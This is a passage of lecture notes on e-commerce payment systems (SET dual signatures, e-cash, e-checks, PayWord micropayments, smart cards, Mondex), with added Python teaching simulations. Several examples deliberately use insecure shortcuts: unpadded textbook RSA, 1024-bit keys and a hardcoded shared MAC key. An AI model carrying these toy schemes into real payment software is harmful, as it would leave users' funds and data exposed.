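    """Return ((n, e), (n, d)); SET used 1024-bit RSA signature keys."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            break
    return (p * q, e), (p * q, pow(e, -1, phi))   # pow(e, -1, m): Python 3.8+


def rsa_sign(digest: bytes, priv) -> int:
    """Textbook RSA: s = m^d mod n over the 256-bit digest (no padding)."""
    n, d = priv
    return pow(int.from_bytes(digest, "big"), d, n)


def rsa_verify(digest: bytes, signature: int, pub) -> bool:
    """Apply the public key: s^e mod n must equal the digest the verifier computed."""
    n, e = pub
    return pow(signature, e, n) == int.from_bytes(digest, "big")


# --- dual signature ---------------------------------------------------------
def dual_sign(priv, pi: bytes, oi: bytes) -> int:
    """Cardholder: DS = Sign( H[ H[PI] || H[OI] ] )."""
    return rsa_sign(sha256(sha256(pi) + sha256(oi)), priv)


def merchant_verify(pub, oi: bytes, pimd: bytes, ds: int) -> bool:
    """Merchant holds OI, H[PI] (PIMD) and DS; it never sees the PI itself."""
    return rsa_verify(sha256(pimd + sha256(oi)), ds, pub)


def gateway_verify(pub, pi: bytes, oimd: bytes, ds: int) -> bool:
    """Gateway holds PI, H[OI] (OIMD) and DS; it never sees the OI itself."""
    return rsa_verify(sha256(sha256(pi) + oimd), ds, pub)


if __name__ == "__main__":
    pub, priv = generate_keypair()
    oi = b"order: 2 x textbook, total 1500 INR"           # constructed sample OI
    pi = b"card 4111111111111111 exp 12/26 amount 1500"    # constructed sample PI
    ds = dual_sign(priv, pi, oi)
    print("merchant:", merchant_verify(pub, oi, sha256(pi), ds))
    print("gateway: ", gateway_verify(pub, pi, sha256(oi), ds))
    tampered = b"order: 20 x textbook, total 15000 INR"
    print("tampered OI at merchant:", merchant_verify(pub, tampered, sha256(pi), ds))
```

Each verifier only needs the digest of the half it does not hold, which is exactly what lets the cardholder release PI to the gateway and OI to the merchant without either party learning the other half, while any change to OI, PI or DS makes the comparison fail.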

DIGITAL ENVELOPE

SET delivers confidential messages in a digital envelope: the sender encrypts the message with a freshly generated symmetric (DES) session key, encrypts that session key with the recipient's public key-exchange key, and sends both together. The recipient recovers the session key with its private key-exchange key and then decrypts the message, so only the intended recipient (for example the payment gateway, in the case of the PI) can open the envelope.

SET PROTOCOL

The SET protocol has four phases: initiation, purchase, authorization and capture.

1. Initiation: the cardholder sends a purchase initiation request to the merchant to initialize the payment. The merchant returns a response message to the cardholder.

2. Purchase: the cardholder sends the purchase order together with the payment instruction to the merchant.

3. Authorization: the merchant obtains authorization from the issuer via the payment gateway.

4. Capture: the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored-value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers: banks or non-bank institutions that issue e-cash.
• Customers: the users who spend e-cash.
• Merchants or traders: the vendors who receive e-cash.
• Regulators: the related authorities or state tax agencies.

For an e-cash transaction to occur, we need to go through at least three stages:

Account setup: customers obtain e-cash accounts through certain issuers. Merchants who would like to accept e-cash also need to arrange accounts with the various e-cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: customers purchase goods or services and give the merchants tokens which represent the equivalent e-cash. Purchase information is usually encrypted when transmitted over the network.

Authentication: merchants contact the e-cash issuers about the purchase and the amount of e-cash involved. The e-cash issuers then authenticate the transaction and approve the amount of e-cash involved.

E-cash payment system

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of an e-cash payment system; it gives an idea of how the system works, and is explained step by step below.

1. The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues money in the form of tokens, generally in denominations of tens and hundreds, or as specified by the customer.

2. In the second phase, the customer endorses those tokens to the merchant to acquire services, and authenticates the payment for the trader.

3. In the third phase, the trader approaches the token issuer (the customer's bank); after authenticating the tokens, the issuing bank converts the tokens into electronic funds and transfers them into the trader's account.

4. Finally, after receiving payment for the respective services, the trader provides the requisite service or product and also notifies the customer that the payment made by the customer into the trader's account has been approved.

E-cash, in summary, is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.

• Like the serial numbers on real currency notes, the e-cash numbers are unique.
• Each is issued by a bank and represents a specified sum of real money.
• It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.
• Anonymity is preserved unless double spending is attempted.
• Serial numbers can allow tracing to prevent money laundering.
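The three-stage token flow described above (withdrawal from the issuer, payment to the merchant, merchant deposit and issuer authentication) together with double-spend detection on the token serial numbers, as an added example written for this page rather than code from the original notes or from any real e-cash product. The issuer authenticates its own tokens with an HMAC under a key only it holds, which suffices here because the issuer is the only party that ever verifies a token; the blind-signature technique that real e-cash systems used to keep the serial number hidden from the issuer (and so preserve anonymity) is not shown. Account holders, balances and denominations are constructed sample data.

```python
"""Added example: online e-cash tokens with issuer-side double-spend detection."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    serial: str   # unique, like the serial number on a banknote
    value: int    # denomination in the smallest currency unit
    tag: str      # issuer's HMAC over (serial, value)


class Issuer:
    """Bank or non-bank institution that mints tokens and later redeems them."""

    def __init__(self):
        self._key = secrets.token_bytes(32)      # MAC key known only to the issuer
        self.accounts = {}                       # holder -> balance
        self._spent = set()                      # serials already redeemed

    def open_account(self, holder, balance=0):
        """Stage 1 (account setup) for customers and merchants alike."""
        self.accounts[holder] = balance

    def _tag(self, serial, value):
        msg = f"{serial}:{value}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, holder, denominations):
        """Debit the customer's account and mint one token per requested denomination."""
        total = sum(denominations)
        if self.accounts.get(holder, 0) < total:
            raise ValueError("insufficient funds")
        self.accounts[holder] -= total
        tokens = []
        for value in denominations:
            serial = secrets.token_hex(16)        # fresh 128-bit serial number
            tokens.append(Token(serial, value, self._tag(serial, value)))
        return tokens

    def redeem(self, merchant, token):
        """Stage 3 (authentication): accept a token presented by a merchant and credit
        the merchant.  False for a forged, altered or already-spent token."""
        expected = self._tag(token.serial, token.value)
        if not hmac.compare_digest(expected, token.tag):   # forged or value altered
            return False
        if token.serial in self._spent:                    # double spend attempt
            return False
        self._spent.add(token.serial)
        self.accounts[merchant] = self.accounts.get(merchant, 0) + token.value
        return True


def purchase(issuer, merchant, tokens, price):
    """Stage 2 (purchase) seen from the merchant: the goods are released only if the
    tokens cover the price and the issuer accepts every one of them."""
    if sum(t.value for t in tokens) < price:
        return False
    return all(issuer.redeem(merchant, t) for t in tokens)


if __name__ == "__main__":
    bank = Issuer()
    bank.open_account("alice", 500)              # constructed sample customer
    bank.open_account("shop", 0)                 # constructed sample merchant
    wallet = bank.withdraw("alice", [100, 100, 10])
    print(purchase(bank, "shop", wallet[:2], 200))   # True: shop credited 200
    print(purchase(bank, "shop", wallet[:2], 200))   # False: same serials again
    forged = Token(wallet[2].serial, 1000, wallet[2].tag)
    print(bank.redeem("shop", forged))               # False: MAC does not match
    print(bank.accounts)
```

Because the issuer keeps the set of redeemed serials, replaying a token is caught at deposit time even though the token bytes are perfectly valid; this is the online form of the double-spending check, while the anonymity property listed above requires the blinding step that this toy omits.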

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is argued to be more secure than other online payment modes because no reusable credential such as a card number or password is handed to the trader; the transaction is effectively an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind the risk of Internet security breaches or theft. Online hacking and cracking can be guarded against by using SSL/TLS for website security, keeping the website link on the HTTPS protocol, and running proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

• Electronic cash protects its user against theft: with electronic cash the customer does not need to provide financial information.

• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific threshold for additional charges, which is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system itself is, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

• While making the payment it is very important that the Internet connection and power supply stay active. If the payment is in process and the Internet connection fails in between, it can lead to loss of information, i.e. the amount is charged but does not reach the trader, and the refund takes a long time, in general at least 30-45 days.

• E-cash is not for everyone. Low-income segments without computer and Internet access are unable to enjoy the use of e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make e-cash more complete. In countries such as India, where people were hesitant to use such methods, there has been tremendous growth in the use of online payments and the e-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

PREPARED BY ARUN PRATAP SINGH 26

26

E-CHECK

What is an electronic check

Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business

eCheck a new payment instrument combining the security speed and processing efficiencies of

all-electronic transactions with the familiar and well-developed legal infrastructure and business

processes associated with paper checks is the first and only electronic payment mechanism

chosen by the United States Treasury to make high-value payments over the public Internet

How electronic checks work

The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider

How does the ACH Network work with eChecks

The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. Time saving and hassle reduction are not the only benefits:

1. Reduce processing costs by up to 60 percent. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies with records of fraud.

Protecting your businessmdashand your customers

Electronic check conversion is one of the more secure payment methods in the electronic payment processing industry because it can use the following information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. A digital signature is a value computed over the data with the signer's private key; it gives the receiver a reliable indication that the information was actually sent by the holder of that key and has not been altered since. A digital certificate is a related but distinct object: it binds a public key to an identity, so that the verifier knows whose key it is checking. Digital signatures are used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because a digital signature cannot be produced, or moved onto different data, without the private key, it is a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a method that uses a pair of keys: one is kept secret and the other is published. With electronic check conversion, the private key is the secret value used to create the digital signature on the echeck, and the public key is given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with. A signature does not hide the data; confidentiality is the job of encryption, which is a separate mechanism.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks, for example by rejecting a second presentment with the same routing number, account number, check number and amount.
3. Encryption. eCheck data is encrypted in transit between merchant, processor and bank; the notes cite 128-bit encryption over Secure Sockets Layer (SSL). SSL itself is now deprecated, so a current deployment should require TLS 1.2 or later and refuse SSL entirely.

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal law requires you to post a notification about this change and give your customers a take-away copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. According to the vendor, businesses using QuickBooks Payments get paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize the electronic debit and to enter the bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers the order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House System (ACH). Funds are deposited in approximately 1-3 business days.
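An added example, not from the notes and not CyberSource's code, of the capture-and-validate step that both flows above depend on: parsing the MICR line a check scanner reads, checking the ABA routing number's check digit, and masking the account number before anything is logged. The MICR lines and account numbers are constructed; the routing numbers are published ABA numbers chosen because their check digits are easy to confirm by hand.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# E-13B MICR symbols a check scanner emits: transit (brackets the routing
# number) and on-us (ends the account number). The sample lines are constructed.
TRANSIT, ON_US = "\u2446", "\u2448"

def aba_check_digit_ok(routing: str) -> bool:
    """ABA routing transit number: weights 3,7,1 repeated, weighted sum mod 10 == 0."""
    if not re.fullmatch(r"\d{9}", routing):
        return False
    weights = (3, 7, 1, 3, 7, 1, 3, 7, 1)
    return sum(int(c) * w for c, w in zip(routing, weights)) % 10 == 0

@dataclass(frozen=True)
class CheckData:
    routing: str
    account: str
    check_number: Optional[str]

def parse_micr(line: str) -> CheckData:
    """Parse 'TRANSIT rrrrrrrrr TRANSIT aaaaaaa ON_US nnnn' and validate the routing number."""
    m = re.fullmatch(
        rf"\s*{TRANSIT}(\d{{9}}){TRANSIT}\s*([\d\s-]+?)\s*{ON_US}\s*(\d+)?\s*", line)
    if not m:
        raise ValueError("not a recognised MICR line")
    routing, check_number = m.group(1), m.group(3)
    account = re.sub(r"[\s-]", "", m.group(2))      # printers space/dash the account field
    if not aba_check_digit_ok(routing):
        raise ValueError(f"routing number {routing} fails the ABA check digit")
    if not account:
        raise ValueError("empty account field")
    return CheckData(routing, account, check_number)

def mask_account(account: str) -> str:
    """Routing + full account number is enough to draft funds; keep only the tail."""
    return "*" * max(0, len(account) - 4) + account[-4:]

def screen_check(line: str) -> Tuple[bool, str]:
    """Outcome the virtual terminal would record: (accepted, message that is safe to log)."""
    try:
        check = parse_micr(line)
    except ValueError as err:
        return False, f"rejected: {err}"
    return True, (f"routing {check.routing} account {mask_account(check.account)} "
                  f"check {check.check_number or '?'}")

if __name__ == "__main__":
    for sample in (f"{TRANSIT}021000021{TRANSIT} 1234567890{ON_US} 1042",
                   f"{TRANSIT}021000022{TRANSIT} 1234567890{ON_US} 1043"):
        print(screen_check(sample))
```

The check digit only catches mis-reads and typos; whether the account exists and is in good standing is what the processor's validation service in step 4 answers.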

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment, credit based)
PayWord (post-payment)


MICRO PAYMENT IS -

Very small payments made over the Web
Transactions too small for credit cards
Can be as little as a fraction of a cent
An alternative to subscription and advertising
Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single, larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.
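An added example, not from the notes, of the hash-chain construction behind PayWord (named in the list of micropayment methods above) combined with the accumulate-then-settle broker of the scheme just described. The user commits to the root of a hash chain, pays by revealing successive chain elements, the vendor verifies each payment with one hash per unit and no signatures, and the broker settles the whole run once. The class names, the one-cent unit and a broker that keeps a plain registry instead of issuing signed user certificates are assumptions.

```python
import hashlib
import hmac
import secrets

# Hash-chain micropayments in the style of PayWord. Assumption: the broker's
# signed user certificate is reduced to the broker remembering which chain
# roots it has registered for whom.

def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()

class UserChain:
    """Payer side: w_n is random, w_i = h(w_{i+1}); w_0 is the public commitment."""
    def __init__(self, length: int):
        if length < 1:
            raise ValueError("chain needs at least one payword")
        words = [secrets.token_bytes(32)]            # w_n, never revealed
        for _ in range(length):
            words.append(h(words[-1]))
        self.words = words[::-1]                     # words[i] == w_i, words[0] == w_0
        self.length, self.spent = length, 0

    def commitment(self) -> bytes:
        return self.words[0]

    def pay(self, units: int = 1):
        """Reveal w_{spent+units}; every word revealed is worth `units` more than the last."""
        if units < 1 or self.spent + units > self.length:
            raise ValueError("chain exhausted or bad amount")
        self.spent += units
        return self.words[self.spent], self.spent

class VendorAccount:
    """Payee side: a word is valid only if hashing it forward reaches the last accepted word."""
    def __init__(self, commitment: bytes):
        self.last_word, self.last_index = commitment, 0

    def accept(self, word: bytes, index: int) -> bool:
        steps = index - self.last_index
        if steps <= 0:
            return False                             # replay or out-of-order word
        x = word
        for _ in range(steps):                       # cost: `steps` hashes, no signatures
            x = h(x)
        if not hmac.compare_digest(x, self.last_word):
            return False                             # forged word
        self.last_word, self.last_index = word, index
        return True

class Broker:
    """Aggregator: settles once per vendor per chain instead of once per micropayment."""
    def __init__(self, unit_cents: int):
        self.unit_cents, self.registered = unit_cents, {}

    def register(self, user: str, commitment: bytes) -> None:
        self.registered[commitment] = user

    def redeem(self, commitment: bytes, last_word: bytes, last_index: int) -> int:
        """Cents owed to the vendor, verified with the same hash walk the vendor used."""
        if commitment not in self.registered:
            return 0
        if not VendorAccount(commitment).accept(last_word, last_index):
            return 0
        return last_index * self.unit_cents

def demo() -> dict:
    user, broker = UserChain(100), Broker(unit_cents=1)
    broker.register("alice", user.commitment())
    vendor = VendorAccount(user.commitment())
    w1, i1 = user.pay()          # 1 cent
    w4, i4 = user.pay(3)         # 3 more cents in a single message
    return {"first": vendor.accept(w1, i1), "replay": vendor.accept(w1, i1),
            "batch": vendor.accept(w4, i4),
            "forged": vendor.accept(secrets.token_bytes(32), 5),
            "settled_cents": broker.redeem(user.commitment(), vendor.last_word, vendor.last_index)}
```

The vendor only ever needs to keep the last accepted word and index, and the broker needs only the final pair to settle, which is what keeps per-transaction cost near zero.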

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer's side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority; much more important than security is trust. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance. Low per-transaction value does not make security irrelevant, however: a scheme is only viable if verification is cheap, so it still has to prevent forgery and replay of tokens at scale, which is why schemes such as PayWord use hash chains that cost one hash to check.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: payment via mobile phone bill. The customer enters his or her mobile phone number and receives an SMS with a TAN (transaction number) in order to confirm payment.

Ebank2pay: payment using online banking. The customer transfers the payment amount through his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by Visa, MasterCard SecureCode).

Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses ndash

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card

Standard credit card-sized, with a microchip embedded on it
Two types:
o Memory-only chips
o Microprocessor chips
Can hold up to 32,000 bytes
Newer smart cards have math co-processors
o Perform complex encryption routines quickly
In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –


Why Smart Cards –

Improve the convenience and security of any transaction
Provide tamper-resistant storage of user and account identity (secrets are used on the chip and never exported)
Provide vital components of system security
Protect against a wide range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel
o Seoul bus system: 4M cards, 1B transactions since 1996
o Planned for the SF Bay Area system
Authentication, ID
Medical records
E-cash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks, etc.
Keep transaction records
Password protection and "lock card" functions
Portable balance finder to check balance
Support for multiple currencies


ADVANTAGES

CONSUMER –

Convenience
Accessibility
On-chip record of recent transactions
Home load
Internet purchases

MERCHANT –

Reliable offline payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy –

Principles protected
o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o a rolling log of 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos between applications (ITSEC E6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with cryptographic protocols and tamper-resistant hardware (no hardware is truly tamper-proof) intended to keep an attacker from extracting keys or altering the stored value. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to Mondex, the system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. The card keeps only a bounded, rolling transaction log (the privacy notes above cite the last 10 transactions), so after a number of transactions older entries are overwritten and significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
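An added simulation, not Mondex's code, of the offline card-to-card transfer and the bounded on-card log discussed above: value is debited before the transfer message leaves the payer, each transfer carries a sequence number so a captured message cannot be replayed into the payee a second time, and the card's log keeps only the last ten entries, so earlier transactions are no longer retrievable from the card. A single issuer MAC key shared by all purses stands in for Mondex's per-purse signature keys and certificates; that key, the log size and the purse ids are assumptions.

```python
import hashlib
import hmac
from collections import deque

# Assumption: one issuer-provisioned MAC key shared by every purse stands in
# for Mondex's per-purse RSA keys and certificates (not how the real product
# worked); the transfer logic and the bounded on-card log are what this shows.
ISSUER_KEY = b"issuer-key-for-illustration-only"
LOG_SIZE = 10                      # "rolling 10 transactions" kept on the card

def tag(body: bytes) -> str:
    return hmac.new(ISSUER_KEY, body, hashlib.sha256).hexdigest()

class Purse:
    def __init__(self, purse_id: str, balance_cents: int):
        self.id = purse_id
        self.balance = balance_cents
        self.seq = 0                                  # counter stamped on outgoing transfers
        self.last_seen = {}                           # payer id -> highest sequence accepted
        self.total = 0                                # transactions ever made on this purse
        self.log = deque(maxlen=LOG_SIZE)             # oldest entry is silently overwritten

    def pay(self, payee_id: str, amount: int) -> bytes:
        """Debit first, then emit the value transfer message; no network is involved."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient stored value")
        self.seq += 1
        body = f"{self.id}|{payee_id}|{self.seq}|{amount}".encode()
        self.balance -= amount
        self._record(("out", payee_id, self.seq, amount))
        return body + b"|" + tag(body).encode()

    def receive(self, message: bytes) -> bool:
        payer, payee, seq, amount, received_tag = message.decode().split("|")
        body = f"{payer}|{payee}|{seq}|{amount}".encode()
        if payee != self.id or not hmac.compare_digest(tag(body), received_tag):
            return False                              # not for us, forged, or altered
        seq, amount = int(seq), int(amount)
        if seq <= self.last_seen.get(payer, 0):
            return False                              # replayed value transfer
        self.last_seen[payer] = seq
        self.balance += amount
        self._record(("in", payer, seq, amount))
        return True

    def _record(self, entry) -> None:
        self.total += 1
        self.log.append(entry)

    def lost_log_entries(self) -> int:
        """How many of this purse's transactions can no longer be retrieved from the card."""
        return self.total - len(self.log)

def demo() -> dict:
    alice, shop = Purse("alice", 2000), Purse("shop", 0)
    first = alice.pay("shop", 150)
    results = {"first": shop.receive(first), "replay": shop.receive(first)}
    altered = first.replace(b"|150|", b"|999|")      # amount edited after the MAC was computed
    results["altered"] = shop.receive(altered)
    for _ in range(12):                               # push the payer's log past its size
        shop.receive(alice.pay("shop", 10))
    results.update(alice_balance=alice.balance, shop_balance=shop.balance,
                   alice_log=len(alice.log), alice_lost=alice.lost_log_entries())
    return results
```

Two properties of the page's description fall out directly: a lost card takes its balance with it, because nothing outside the card records the value, and once `lost_log_entries()` is non-zero the issuer can no longer reconstruct that purse's history from the card alone, which is the auditability gap the critics cite.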

E-GOVERNANCE

